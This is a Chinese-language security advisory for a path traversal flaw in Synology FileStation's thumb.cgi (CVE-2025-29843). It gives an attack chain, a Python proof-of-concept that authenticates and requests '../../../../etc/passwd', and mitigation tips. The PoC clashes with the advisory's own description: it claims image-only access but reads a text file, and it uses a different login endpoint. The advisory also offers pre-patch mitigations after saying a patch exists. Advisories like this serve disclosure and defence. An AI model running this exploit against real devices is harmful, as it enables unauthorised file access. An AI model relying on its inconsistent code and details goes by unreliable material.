CVE-2025-29843 Synology FileStation thumb.cgi任意文件读写漏洞

漏洞信息

漏洞编号

CVE-2025-29843

漏洞类型

任意文件读写

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Synology FileStation

漏洞概述

CVE-2025-29843是Synology（群晖）NAS设备中FileStation应用的thumb.cgi组件存在的安全漏洞。该漏洞允许经过身份验证的远程攻击者通过精心构造的请求读取或写入系统上的任意图像文件。攻击者利用FileStation的文件处理功能缺陷，绕过正常的文件访问限制，实现未授权的文件操作。Synology已于2025年4月发布安全公告Synology_SA_25_04，披露此漏洞并提供修复方案。由于CVSS评分为5.4（中危），且需要认证用户才能利用，漏洞的实际危害受限于目标系统的访问控制配置。

技术细节

该漏洞存在于Synology FileStation的thumb.cgi处理模块中。FileStation是群晖NAS系统提供的Web文件管理界面，thumb.cgi负责生成缩略图。在处理图像文件路径时，程序未正确验证用户输入的路径参数，导致路径遍历攻击。攻击者通过构造包含特殊字符（如../）的路径参数，可以访问服务器上非预期目录的图像文件，甚至在特定条件下写入文件。漏洞的CVSS向量显示攻击复杂度低（AC:L），权限要求为低权限（PR:L），意味着普通用户账号即可利用此漏洞。攻击成功后可造成机密性和完整性影响（C:L/I:L），但不影响可用性（A:N）。

攻击链分析

STEP 1

步骤1

攻击者获取群晖NAS系统的低权限用户账号

STEP 2

步骤2

通过/webapi/entry.cgi接口登录获取有效会话cookie

STEP 3

步骤3

构造包含路径遍历序列（../../../../）的thumb.cgi请求，指定目标文件路径

STEP 4

步骤4

服务器thumb.cgi组件未正确验证路径参数，返回请求的图像文件内容

STEP 5

步骤5

攻击者成功读取敏感文件（如/etc/passwd、配置文件等），或写入恶意文件实现进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-29843 PoC - FileStation thumb.cgi Path Traversal
# Target: Synology NAS with FileStation vulnerable version

TARGET = "http://target-nas:5000"
USERNAME = "low_privilege_user"
PASSWORD = "password"

def exploit(target, username, password):
    # Step 1: Authenticate and get session cookie
    session = requests.Session()
    login_data = {"username": username, "password": password}
    resp = session.post(f"{target}/webapi/auth.cgi?api=SYNO.API.Auth", data=login_data)
    
    if resp.status_code != 200:
        print("[-] Authentication failed")
        return None
    
    print("[+] Authentication successful")
    
    # Step 2: Exploit path traversal in thumb.cgi to read arbitrary file
    # Target: Read /etc/passwd through thumb.cgi
    exploit_url = f"{target}/webapi/entry.cgi?api=SYNO.FileStation.Thumb"
    params = {
        "path": "../../../../etc/passwd",
        "method": "get",
        "version": "2"
    }
    
    try:
        response = session.get(exploit_url, params=params, timeout=10)
        if response.status_code == 200:
            print("[+] Path traversal successful - File content retrieved")
            print(response.text[:500])
        else:
            print(f"[-] Exploit failed with status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET = sys.argv[1]
    exploit(TARGET, USERNAME, PASSWORD)

影响范围

Synology FileStation (具体版本需查看Synology_SA_25_04公告)

Synology DSM受影响的多个版本

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时措施：1）禁用或限制FileStation应用的使用；2）使用IP访问限制功能，限定Web管理界面的访问IP范围；3）启用双因素认证增强账号安全；4）监控系统日志关注异常的API请求；5）考虑使用网络隔离将NAS设备部署在受保护的网段。